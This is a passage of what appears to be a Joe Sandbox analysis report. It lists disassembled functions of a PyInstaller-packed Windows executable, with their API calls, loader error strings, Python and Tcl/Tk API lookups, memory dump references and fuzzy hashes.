                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                        • API String ID: 190572456-2007157414
                                                                                                                                                                                                                        • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                        • Instruction ID: 9b1ccab0b421e941c23284766eb153ada6482c7a00f67db8ad6aa8deb611943c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75127665D0EB4391EA15BF05ACD01B4A6B0EF15750BDE243EC90E12362EF7CB548BE68
                                                                                                                                                                                                                        Function 00007FF729346EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                        • API String ID: 190572456-3427451314
                                                                                                                                                                                                                        • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                        • Instruction ID: 4d82adfad37b0ee729b8e5053ef5140408281d5945c7f8281dff59dafb2fa5fd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07E1736490DB4390EA55BF16ACD01B4E3B5EF04754FDE203EC81E063A6EF7CA548EA64
                                                                                                                                                                                                                        Function 00007FF7293477D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293486B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF729343FA4,00000000,00007FF729341925), ref: 00007FF7293486E9
                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF729347C97,?,?,FFFFFFFF,00007FF729343834), ref: 00007FF72934782C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293426C0: MessageBoxW.USER32 ref: 00007FF729342736
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                        • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                        • Instruction ID: f291b8a41a520299708c8d110c0ea14fc2c1321dc5482e9e16490aa3fece6184
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D417121A2C64241FA50BF26DCD16BAE271EF44784FCE603DD64E46697EE2CE504AF20
                                                                                                                                                                                                                        Function 00007FF7293420F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                        • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                        • Instruction ID: f0e2f7ab3fb036d6dd34e919fc23599da1aaa38fe7f87ecbdaf1f27f37a2fdba
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8510626608BA186D6349F22A8581BAF7B1F798B61F444129EBCE83695DF3CD045DF20
                                                                                                                                                                                                                        Function 00007FF7293555A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                        • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                        • Instruction ID: 23630b337205548e1d3c943d1cc8822c243187159a228300b6fe1a84e0721774
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D129363A18243A6FB207E15D894279FAB2FB8C750FDC4039D689465C6DB3CF590AF24
                                                                                                                                                                                                                        Function 00007FF7293502E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                        • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                        • Instruction ID: 471d67feb4678dfe2783f5d2991a533e5b2ee5d3b3e6681f9ddf31471ea463b7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9129361A0C143A6FB207E14D89477AEAB1FB8C754FCC4039D68D465D6DB3EE880AF61
                                                                                                                                                                                                                        Function 00007FF729341050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: 1d034d1ca19c55d75a09766c939d17a981397b61224439c039fcfa6439f6fc8e
                                                                                                                                                                                                                        • Instruction ID: ff8955bd1a9239e1e609b570fe31f29f8e7b361e52bdeaef4288ee104eb156c7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d034d1ca19c55d75a09766c939d17a981397b61224439c039fcfa6439f6fc8e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43419E21A08A8242EA10BF52AC801BAE7B1FB54BC4F8D5039DD1D57797DE3CE404AF10
                                                                                                                                                                                                                        Function 00007FF729341440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                        • Opcode ID: be8de7dda6ff4457432e1c6afcceb27f652e1bca2516d45b5f51c7532417b660
                                                                                                                                                                                                                        • Instruction ID: 0c4e20bc16b3d03156a77519c31a34dbf2bbaf3cbfde96b0a1985b9b9afa970f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be8de7dda6ff4457432e1c6afcceb27f652e1bca2516d45b5f51c7532417b660
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24419F21A08A4281EA20BF55AC801FAE3B0FF14794F8E5039DE5D57A97EE3CE541AF14
                                                                                                                                                                                                                        Function 00007FF72934DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                        • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                        • Instruction ID: 6394b694e7f547fc76d9a1a21da4203ac849d03476ebfbbf6dd2dc1fe07e8362
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84D17132A0874186EB20AF65DC803AEB7B0FB55788F992139DA5D57797CF38E480DB10
                                                                                                                                                                                                                        Function 00007FF72934CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF72934D29A,?,?,?,00007FF72934CF8C,?,?,?,00007FF72934CB89), ref: 00007FF72934D06D
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF72934D29A,?,?,?,00007FF72934CF8C,?,?,?,00007FF72934CB89), ref: 00007FF72934D07B
                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF72934D29A,?,?,?,00007FF72934CF8C,?,?,?,00007FF72934CB89), ref: 00007FF72934D0A5
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF72934D29A,?,?,?,00007FF72934CF8C,?,?,?,00007FF72934CB89), ref: 00007FF72934D113
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF72934D29A,?,?,?,00007FF72934CF8C,?,?,?,00007FF72934CB89), ref: 00007FF72934D11F
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                        • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                        • Instruction ID: 1c300a69103f0eaba41369b709d693ee1325559ddf77d4d0ea8fea14fda37217
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C131822161A64291EE15AF12AC80565A3B4FF09B64F9E153DDD2D07386DF3CF442DA24
                                                                                                                                                                                                                        Function 00007FF72935A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                        • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                                                                                                        • Instruction ID: 133fe67f4f58f678fa5f981ea165c7ff467e95a9ad4c80a266d8d8540ce4696c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C215120A0C24262FA64BB619EC5179E5B2DF4C7A0FCC463CD93E467D7DD2CA4047E21
                                                                                                                                                                                                                        Function 00007FF72936707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                        • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                        • Instruction ID: c0f4b25a6b9760b1e221e06824e8b237eb2e45a589eee8f81ae86dcbb8a4c413
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26118421A18B4286E7509F12EC84365A7B0FB48BE4F89023CDA1D87795DF7CD404CF54
                                                                                                                                                                                                                        Function 00007FF7293481F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7293439F2), ref: 00007FF72934821D
                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7293439F2), ref: 00007FF72934827A
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293486B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF729343FA4,00000000,00007FF729341925), ref: 00007FF7293486E9
                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7293439F2), ref: 00007FF729348305
                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7293439F2), ref: 00007FF729348364
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7293439F2), ref: 00007FF729348375
                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7293439F2), ref: 00007FF72934838A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
